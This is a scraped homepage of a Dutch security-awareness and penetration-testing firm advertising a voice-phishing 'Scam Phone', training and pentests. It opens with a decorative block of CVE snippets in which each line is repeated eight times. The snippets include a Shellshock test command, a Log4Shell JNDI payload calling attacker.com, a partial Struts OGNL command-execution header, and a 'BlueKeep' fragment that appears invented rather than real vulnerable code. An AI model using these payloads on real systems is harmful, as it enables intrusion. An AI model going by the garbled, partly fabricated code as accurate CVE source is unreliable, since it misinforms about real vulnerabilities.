/* CVE-2014-0160 — Heartbleed */        /* CVE-2014-0160 — Heartbleed */        /* CVE-2014-0160 — Heartbleed */        /* CVE-2014-0160 — Heartbleed */        /* CVE-2014-0160 — Heartbleed */        /* CVE-2014-0160 — Heartbleed */        /* CVE-2014-0160 — Heartbleed */        /* CVE-2014-0160 — Heartbleed */        
int dtls1_process_heartbeat(SSL *s) {        int dtls1_process_heartbeat(SSL *s) {        int dtls1_process_heartbeat(SSL *s) {        int dtls1_process_heartbeat(SSL *s) {        int dtls1_process_heartbeat(SSL *s) {        int dtls1_process_heartbeat(SSL *s) {        int dtls1_process_heartbeat(SSL *s) {        int dtls1_process_heartbeat(SSL *s) {        
  unsigned char *p = &s->s3->rrec.data[0], *pl;          unsigned char *p = &s->s3->rrec.data[0], *pl;          unsigned char *p = &s->s3->rrec.data[0], *pl;          unsigned char *p = &s->s3->rrec.data[0], *pl;          unsigned char *p = &s->s3->rrec.data[0], *pl;          unsigned char *p = &s->s3->rrec.data[0], *pl;          unsigned char *p = &s->s3->rrec.data[0], *pl;          unsigned char *p = &s->s3->rrec.data[0], *pl;        
  unsigned short hbtype;          unsigned short hbtype;          unsigned short hbtype;          unsigned short hbtype;          unsigned short hbtype;          unsigned short hbtype;          unsigned short hbtype;          unsigned short hbtype;        
  unsigned int payload;          unsigned int payload;          unsigned int payload;          unsigned int payload;          unsigned int payload;          unsigned int payload;          unsigned int payload;          unsigned int payload;        
  hbtype = *p++;          hbtype = *p++;          hbtype = *p++;          hbtype = *p++;          hbtype = *p++;          hbtype = *p++;          hbtype = *p++;          hbtype = *p++;        
  n2s(p, payload);          n2s(p, payload);          n2s(p, payload);          n2s(p, payload);          n2s(p, payload);          n2s(p, payload);          n2s(p, payload);          n2s(p, payload);        
  pl = p;          pl = p;          pl = p;          pl = p;          pl = p;          pl = p;          pl = p;          pl = p;        
  // BUG: no bounds check on payload length          // BUG: no bounds check on payload length          // BUG: no bounds check on payload length          // BUG: no bounds check on payload length          // BUG: no bounds check on payload length          // BUG: no bounds check on payload length          // BUG: no bounds check on payload length          // BUG: no bounds check on payload length        
  memcpy(bp, pl, payload);          memcpy(bp, pl, payload);          memcpy(bp, pl, payload);          memcpy(bp, pl, payload);          memcpy(bp, pl, payload);          memcpy(bp, pl, payload);          memcpy(bp, pl, payload);          memcpy(bp, pl, payload);        
  // attacker reads up to 64KB of server memory          // attacker reads up to 64KB of server memory          // attacker reads up to 64KB of server memory          // attacker reads up to 64KB of server memory          // attacker reads up to 64KB of server memory          // attacker reads up to 64KB of server memory          // attacker reads up to 64KB of server memory          // attacker reads up to 64KB of server memory        
  return 0;          return 0;          return 0;          return 0;          return 0;          return 0;          return 0;          return 0;        
}        }        }        }        }        }        }        }        
                                                                
/* CVE-2014-6271 — Shellshock */        /* CVE-2014-6271 — Shellshock */        /* CVE-2014-6271 — Shellshock */        /* CVE-2014-6271 — Shellshock */        /* CVE-2014-6271 — Shellshock */        /* CVE-2014-6271 — Shellshock */        /* CVE-2014-6271 — Shellshock */        /* CVE-2014-6271 — Shellshock */        
env x='() { :;}; echo vulnerable' bash -c "echo test"        env x='() { :;}; echo vulnerable' bash -c "echo test"        env x='() { :;}; echo vulnerable' bash -c "echo test"        env x='() { :;}; echo vulnerable' bash -c "echo test"        env x='() { :;}; echo vulnerable' bash -c "echo test"        env x='() { :;}; echo vulnerable' bash -c "echo test"        env x='() { :;}; echo vulnerable' bash -c "echo test"        env x='() { :;}; echo vulnerable' bash -c "echo test"        
// Bash parses function definitions in environment        // Bash parses function definitions in environment        // Bash parses function definitions in environment        // Bash parses function definitions in environment        // Bash parses function definitions in environment        // Bash parses function definitions in environment        // Bash parses function definitions in environment        // Bash parses function definitions in environment        
// variables but continues executing trailing commands        // variables but continues executing trailing commands        // variables but continues executing trailing commands        // variables but continues executing trailing commands        // variables but continues executing trailing commands        // variables but continues executing trailing commands        // variables but continues executing trailing commands        // variables but continues executing trailing commands        
parse_and_execute(string, name, SEVAL_NONINT);        parse_and_execute(string, name, SEVAL_NONINT);        parse_and_execute(string, name, SEVAL_NONINT);        parse_and_execute(string, name, SEVAL_NONINT);        parse_and_execute(string, name, SEVAL_NONINT);        parse_and_execute(string, name, SEVAL_NONINT);        parse_and_execute(string, name, SEVAL_NONINT);        parse_and_execute(string, name, SEVAL_NONINT);        
// allows remote code execution via CGI, SSH, DHCP        // allows remote code execution via CGI, SSH, DHCP        // allows remote code execution via CGI, SSH, DHCP        // allows remote code execution via CGI, SSH, DHCP        // allows remote code execution via CGI, SSH, DHCP        // allows remote code execution via CGI, SSH, DHCP        // allows remote code execution via CGI, SSH, DHCP        // allows remote code execution via CGI, SSH, DHCP        
if (assignment_acceptable(last_command_exit_value))        if (assignment_acceptable(last_command_exit_value))        if (assignment_acceptable(last_command_exit_value))        if (assignment_acceptable(last_command_exit_value))        if (assignment_acceptable(last_command_exit_value))        if (assignment_acceptable(last_command_exit_value))        if (assignment_acceptable(last_command_exit_value))        if (assignment_acceptable(last_command_exit_value))        
  command = parse_command();          command = parse_command();          command = parse_command();          command = parse_command();          command = parse_command();          command = parse_command();          command = parse_command();          command = parse_command();        
                                                                
/* CVE-2021-44228 — Log4Shell */        /* CVE-2021-44228 — Log4Shell */        /* CVE-2021-44228 — Log4Shell */        /* CVE-2021-44228 — Log4Shell */        /* CVE-2021-44228 — Log4Shell */        /* CVE-2021-44228 — Log4Shell */        /* CVE-2021-44228 — Log4Shell */        /* CVE-2021-44228 — Log4Shell */        
public class JndiLookup implements StrLookup {        public class JndiLookup implements StrLookup {        public class JndiLookup implements StrLookup {        public class JndiLookup implements StrLookup {        public class JndiLookup implements StrLookup {        public class JndiLookup implements StrLookup {        public class JndiLookup implements StrLookup {        public class JndiLookup implements StrLookup {        
  public String lookup(LogEvent event, String key) {          public String lookup(LogEvent event, String key) {          public String lookup(LogEvent event, String key) {          public String lookup(LogEvent event, String key) {          public String lookup(LogEvent event, String key) {          public String lookup(LogEvent event, String key) {          public String lookup(LogEvent event, String key) {          public String lookup(LogEvent event, String key) {        
    // BUG: user input passed directly to JNDI lookup            // BUG: user input passed directly to JNDI lookup            // BUG: user input passed directly to JNDI lookup            // BUG: user input passed directly to JNDI lookup            // BUG: user input passed directly to JNDI lookup            // BUG: user input passed directly to JNDI lookup            // BUG: user input passed directly to JNDI lookup            // BUG: user input passed directly to JNDI lookup        
    return Objects.toString(            return Objects.toString(            return Objects.toString(            return Objects.toString(            return Objects.toString(            return Objects.toString(            return Objects.toString(            return Objects.toString(        
      JndiManager.getDefaultManager().lookup(key), key              JndiManager.getDefaultManager().lookup(key), key              JndiManager.getDefaultManager().lookup(key), key              JndiManager.getDefaultManager().lookup(key), key              JndiManager.getDefaultManager().lookup(key), key              JndiManager.getDefaultManager().lookup(key), key              JndiManager.getDefaultManager().lookup(key), key              JndiManager.getDefaultManager().lookup(key), key        
    );            );            );            );            );            );            );            );        
  }          }          }          }          }          }          }          }        
}        }        }        }        }        }        }        }        
// payload: ${jndi:ldap://attacker.com/exploit}        // payload: ${jndi:ldap://attacker.com/exploit}        // payload: ${jndi:ldap://attacker.com/exploit}        // payload: ${jndi:ldap://attacker.com/exploit}        // payload: ${jndi:ldap://attacker.com/exploit}        // payload: ${jndi:ldap://attacker.com/exploit}        // payload: ${jndi:ldap://attacker.com/exploit}        // payload: ${jndi:ldap://attacker.com/exploit}        
// triggers remote class loading via crafted log message        // triggers remote class loading via crafted log message        // triggers remote class loading via crafted log message        // triggers remote class loading via crafted log message        // triggers remote class loading via crafted log message        // triggers remote class loading via crafted log message        // triggers remote class loading via crafted log message        // triggers remote class loading via crafted log message        
logger.info("User-Agent: " + request.getHeader("User-Agent"));        logger.info("User-Agent: " + request.getHeader("User-Agent"));        logger.info("User-Agent: " + request.getHeader("User-Agent"));        logger.info("User-Agent: " + request.getHeader("User-Agent"));        logger.info("User-Agent: " + request.getHeader("User-Agent"));        logger.info("User-Agent: " + request.getHeader("User-Agent"));        logger.info("User-Agent: " + request.getHeader("User-Agent"));        logger.info("User-Agent: " + request.getHeader("User-Agent"));        
                                                                
/* CVE-2017-5638 — Apache Struts RCE */        /* CVE-2017-5638 — Apache Struts RCE */        /* CVE-2017-5638 — Apache Struts RCE */        /* CVE-2017-5638 — Apache Struts RCE */        /* CVE-2017-5638 — Apache Struts RCE */        /* CVE-2017-5638 — Apache Struts RCE */        /* CVE-2017-5638 — Apache Struts RCE */        /* CVE-2017-5638 — Apache Struts RCE */        
Content-Type: %{(#_='multipart/form-data').        Content-Type: %{(#_='multipart/form-data').        Content-Type: %{(#_='multipart/form-data').        Content-Type: %{(#_='multipart/form-data').        Content-Type: %{(#_='multipart/form-data').        Content-Type: %{(#_='multipart/form-data').        Content-Type: %{(#_='multipart/form-data').        Content-Type: %{(#_='multipart/form-data').        
  (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).          (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).          (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).          (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).          (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).          (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).          (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).          (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).        
  (#_memberAccess?(#_memberAccess=#dm):          (#_memberAccess?(#_memberAccess=#dm):          (#_memberAccess?(#_memberAccess=#dm):          (#_memberAccess?(#_memberAccess=#dm):          (#_memberAccess?(#_memberAccess=#dm):          (#_memberAccess?(#_memberAccess=#dm):          (#_memberAccess?(#_memberAccess=#dm):          (#_memberAccess?(#_memberAccess=#dm):        
  (#container=#context['com.opensymphony.xwork2          (#container=#context['com.opensymphony.xwork2          (#container=#context['com.opensymphony.xwork2          (#container=#context['com.opensymphony.xwork2          (#container=#context['com.opensymphony.xwork2          (#container=#context['com.opensymphony.xwork2          (#container=#context['com.opensymphony.xwork2          (#container=#context['com.opensymphony.xwork2        
  .ActionContext.container'])).          .ActionContext.container'])).          .ActionContext.container'])).          .ActionContext.container'])).          .ActionContext.container'])).          .ActionContext.container'])).          .ActionContext.container'])).          .ActionContext.container'])).        
  (#cmd='whoami').(#iswin=(@java.lang.System          (#cmd='whoami').(#iswin=(@java.lang.System          (#cmd='whoami').(#iswin=(@java.lang.System          (#cmd='whoami').(#iswin=(@java.lang.System          (#cmd='whoami').(#iswin=(@java.lang.System          (#cmd='whoami').(#iswin=(@java.lang.System          (#cmd='whoami').(#iswin=(@java.lang.System          (#cmd='whoami').(#iswin=(@java.lang.System        
  @getProperty('os.name').toLowerCase()          @getProperty('os.name').toLowerCase()          @getProperty('os.name').toLowerCase()          @getProperty('os.name').toLowerCase()          @getProperty('os.name').toLowerCase()          @getProperty('os.name').toLowerCase()          @getProperty('os.name').toLowerCase()          @getProperty('os.name').toLowerCase()        
  .contains('win'))).(#cmds=(#iswin?          .contains('win'))).(#cmds=(#iswin?          .contains('win'))).(#cmds=(#iswin?          .contains('win'))).(#cmds=(#iswin?          .contains('win'))).(#cmds=(#iswin?          .contains('win'))).(#cmds=(#iswin?          .contains('win'))).(#cmds=(#iswin?          .contains('win'))).(#cmds=(#iswin?        
  {'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd}))          {'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd}))          {'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd}))          {'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd}))          {'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd}))          {'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd}))          {'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd}))          {'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd}))        
                                                                
/* CVE-2019-0708 — BlueKeep */        /* CVE-2019-0708 — BlueKeep */        /* CVE-2019-0708 — BlueKeep */        /* CVE-2019-0708 — BlueKeep */        /* CVE-2019-0708 — BlueKeep */        /* CVE-2019-0708 — BlueKeep */        /* CVE-2019-0708 — BlueKeep */        /* CVE-2019-0708 — BlueKeep */        
BOOL rdp_parse_server_settings(rdpRdp* rdp,        BOOL rdp_parse_server_settings(rdpRdp* rdp,        BOOL rdp_parse_server_settings(rdpRdp* rdp,        BOOL rdp_parse_server_settings(rdpRdp* rdp,        BOOL rdp_parse_server_settings(rdpRdp* rdp,        BOOL rdp_parse_server_settings(rdpRdp* rdp,        BOOL rdp_parse_server_settings(rdpRdp* rdp,        BOOL rdp_parse_server_settings(rdpRdp* rdp,        
  STREAM* s, UINT16 length) {          STREAM* s, UINT16 length) {          STREAM* s, UINT16 length) {          STREAM* s, UINT16 length) {          STREAM* s, UINT16 length) {          STREAM* s, UINT16 length) {          STREAM* s, UINT16 length) {          STREAM* s, UINT16 length) {        
  // Use-after-free in RDP channel handling          // Use-after-free in RDP channel handling          // Use-after-free in RDP channel handling          // Use-after-free in RDP channel handling          // Use-after-free in RDP channel handling          // Use-after-free in RDP channel handling          // Use-after-free in RDP channel handling          // Use-after-free in RDP channel handling        
  if (channelCount > 0) {          if (channelCount > 0) {          if (channelCount > 0) {          if (channelCount > 0) {          if (channelCount > 0) {          if (channelCount > 0) {          if (channelCount > 0) {          if (channelCount > 0) {        
    channelDefArray = malloc(channelCount *            channelDefArray = malloc(channelCount *            channelDefArray = malloc(channelCount *            channelDefArray = malloc(channelCount *            channelDefArray = malloc(channelCount *            channelDefArray = malloc(channelCount *            channelDefArray = malloc(channelCount *            channelDefArray = malloc(channelCount *        
      sizeof(CHANNEL_DEF));              sizeof(CHANNEL_DEF));              sizeof(CHANNEL_DEF));              sizeof(CHANNEL_DEF));              sizeof(CHANNEL_DEF));              sizeof(CHANNEL_DEF));              sizeof(CHANNEL_DEF));              sizeof(CHANNEL_DEF));        
    // BUG: freed memory later dereferenced            // BUG: freed memory later dereferenced            // BUG: freed memory later dereferenced            // BUG: freed memory later dereferenced            // BUG: freed memory later dereferenced            // BUG: freed memory later dereferenced            // BUG: freed memory later dereferenced            // BUG: freed memory later dereferenced        
    free(channelDefArray);            free(channelDefArray);            free(channelDefArray);            free(channelDefArray);            free(channelDefArray);            free(channelDefArray);            free(channelDefArray);            free(channelDefArray);        
    channelDefArray[i].name = channelName;            channelDefArray[i].name = channelName;            channelDefArray[i].name = channelName;            channelDefArray[i].name = channelName;            channelDefArray[i].name = channelName;            channelDefArray[i].name = channelName;            channelDefArray[i].name = channelName;            channelDefArray[i].name = channelName;        
  }          }          }          }          }          }          }          }        
}        }        }        }        }        }        }        }        
/* CVE-2014-0160 — Heartbleed */        /* CVE-2014-0160 — Heartbleed */        /* CVE-2014-0160 — Heartbleed */        /* CVE-2014-0160 — Heartbleed */        /* CVE-2014-0160 — Heartbleed */        /* CVE-2014-0160 — Heartbleed */        /* CVE-2014-0160 — Heartbleed */        /* CVE-2014-0160 — Heartbleed */        
int dtls1_process_heartbeat(SSL *s) {        int dtls1_process_heartbeat(SSL *s) {        int dtls1_process_heartbeat(SSL *s) {        int dtls1_process_heartbeat(SSL *s) {        int dtls1_process_heartbeat(SSL *s) {        int dtls1_process_heartbeat(SSL *s) {        int dtls1_process_heartbeat(SSL *s) {        int dtls1_process_heartbeat(SSL *s) {        
  unsigned char *p = &s->s3->rrec.data[0], *pl;          unsigned char *p = &s->s3->rrec.data[0], *pl;          unsigned char *p = &s->s3->rrec.data[0], *pl;          unsigned char *p = &s->s3->rrec.data[0], *pl;          unsigned char *p = &s->s3->rrec.data[0], *pl;          unsigned char *p = &s->s3->rrec.data[0], *pl;          unsigned char *p = &s->s3->rrec.data[0], *pl;          unsigned char *p = &s->s3->rrec.data[0], *pl;        
  unsigned short hbtype;          unsigned short hbtype;          unsigned short hbtype;          unsigned short hbtype;          unsigned short hbtype;          unsigned short hbtype;          unsigned short hbtype;          unsigned short hbtype;        
  unsigned int payload;          unsigned int payload;          unsigned int payload;          unsigned int payload;          unsigned int payload;          unsigned int payload;          unsigned int payload;          unsigned int payload;        
  hbtype = *p++;          hbtype = *p++;          hbtype = *p++;          hbtype = *p++;          hbtype = *p++;          hbtype = *p++;          hbtype = *p++;          hbtype = *p++;        
  n2s(p, payload);          n2s(p, payload);          n2s(p, payload);          n2s(p, payload);          n2s(p, payload);          n2s(p, payload);          n2s(p, payload);          n2s(p, payload);        
  pl = p;          pl = p;          pl = p;          pl = p;          pl = p;          pl = p;          pl = p;          pl = p;        
  // BUG: no bounds check on payload length          // BUG: no bounds check on payload length          // BUG: no bounds check on payload length          // BUG: no bounds check on payload length          // BUG: no bounds check on payload length          // BUG: no bounds check on payload length          // BUG: no bounds check on payload length          // BUG: no bounds check on payload length        
  memcpy(bp, pl, payload);          memcpy(bp, pl, payload);          memcpy(bp, pl, payload);          memcpy(bp, pl, payload);          memcpy(bp, pl, payload);          memcpy(bp, pl, payload);          memcpy(bp, pl, payload);          memcpy(bp, pl, payload);        
  // attacker reads up to 64KB of server memory          // attacker reads up to 64KB of server memory          // attacker reads up to 64KB of server memory          // attacker reads up to 64KB of server memory          // attacker reads up to 64KB of server memory          // attacker reads up to 64KB of server memory          // attacker reads up to 64KB of server memory          // attacker reads up to 64KB of server memory        

Security.Rocks

Maakt security toegankelijk.

Jouw team leert echte aanvallen herkennen door ze zelf te ervaren. Gebouwd door ethisch hackers.

Bekijk de Scam Phonearrow_forward Gratis phishing poster

Scroll

Technische maatregelen zijn er genoeg. Maar de mens blijft de zwakste schakel.

Iedereen is phishingmail-simulaties zat. E-learnings worden weggeklikt. En ondertussen worden aanvallen steeds persoonlijker: AI-gegenereerde stemmen, gerichte social engineering en deepfakes.

Je medewerkers worden steeds vaker privé benaderd. Datalekken onthullen persoonlijke gegevens, die criminelen combineren met publieke informatie van bijvoorbeeld LinkedIn. Een gerichte aanval op iemands privémail of telefoon valt buiten al je technische maatregelen. En dient vaak als opstap naar je bedrijfsomgeving.

Dat los je niet op met een PowerPoint. Dat vraagt om iets wat mensen écht bijblijft.

Voice phishing simulatie

Jouw collega's horen de stem van de CEO, en worden gevraagd om een overboeking.

De Scam Phone simuleert echte voice-phishing op de werkvloer. Geen scherm, geen e-learning. Een telefoon die overgaat, een bekende stem, en een opdracht die net geloofwaardig genoeg is.

De Scam Phone met banner op een kantoorlocatie

record_voice_over

Stemmen laden

Wij laden de stem van jullie CEO, CFO of IT-manager op de telefoon. Binnen een dag klaar.

power

Inpluggen

De telefoon komt per post. Neerzetten, stekker erin, klaar. Geen IT-aansluiting nodig.

groups

Ervaren

Medewerkers nemen op en horen een bekende stem met een verdacht verzoek. Daar praten ze over.

assessment

Rapport voor je board

Na afloop ontvang je een awareness-rapport: hoeveel mensen de telefoon opnamen, hoeveel gesprekken er plaatsvonden en hoeveel het scenario volledig doorliepen. Direct presenteerbaar aan je board.

verified

Praten ze er niet over? Dan betaal je niet.

Dat is onze garantie. We hebben hem nog nooit hoeven inlossen.

Meer over de Scam Phonearrow_forward

format_quote

“Opvallende resultaten binnen een korte tijdspanne. Een uitgebreid rapport met duidelijke voorbeelden en CVSS-scores. Communicatie en flexibiliteit waren van topniveau.”

Sander van de VenCISO

Van awareness tot pentest. Altijd vanuit het perspectief van de aanvaller.

Elke dienst is gebouwd op dezelfde basis: wij weten hoe aanvallen werken, omdat we ze zelf uitvoeren.

Escape Room

Een mobiele escape room op jullie locatie. Jouw team lost cybersecurity-puzzels op, een ethisch hacker doet de debrief.

Training

Van awareness op maat tot Security by Design voor ontwikkelaars. Hands-on, met echte scenario's.

biotech

Penetratietesten

Dezelfde hackers die jouw mensen trainen, testen ook je systemen. Vaste prijs, geen verrassingen, gratis hertest.

Track record

10 jaar, 150+ pentests, en meer kwetsbaarheden gevonden dan we koppen koffie hebben gedronken.

Ervaring

10+

Jaar in offensive security

Gecertificeerd

OSCP

100% gecertificeerd

Track record

150+

Penetratietesten uitgevoerd

Vaste prijs

€0

Aan onverwachte facturen

Waar we trots op zijn

Coronamelder

Kritieke kwetsbaarheden gevonden in alle prototypes. Het ministerie is volledig overgestapt op een nieuw, veiliger ontwerp.

Koningsdag Thuis

Dreigingsmodel en beveiliging van het platform dat de Koninklijke familie hostte. Geen incidenten.

SAP Security Researcher

Kwetsbaarheid gevonden in SAP-inlogfunctionaliteit. Erkend als SAP Acknowledged Security Researcher.

VNG Hall of Fame

Kwetsbaarheid gemeld bij de gemeente Utrecht. Opgenomen in de Hall of Fame van de Vereniging Nederlandse Gemeenten.

Gratis

Echte phishing herken je niet aan spelfouten.

Elke maand ontleden we een echte phishing-aanval in een poster die je kunt ophangen bij de koffieautomaat. Zodat jouw team leert kijken naar context, niet naar typefouten.

Eén mail per maand, geen spam. Je kunt je altijd uitschrijven.

Benieuwd hoe jouw collega's reageren?

Neem vrijblijvend contact op.

Neem contact oparrow_forward contact@security.rocks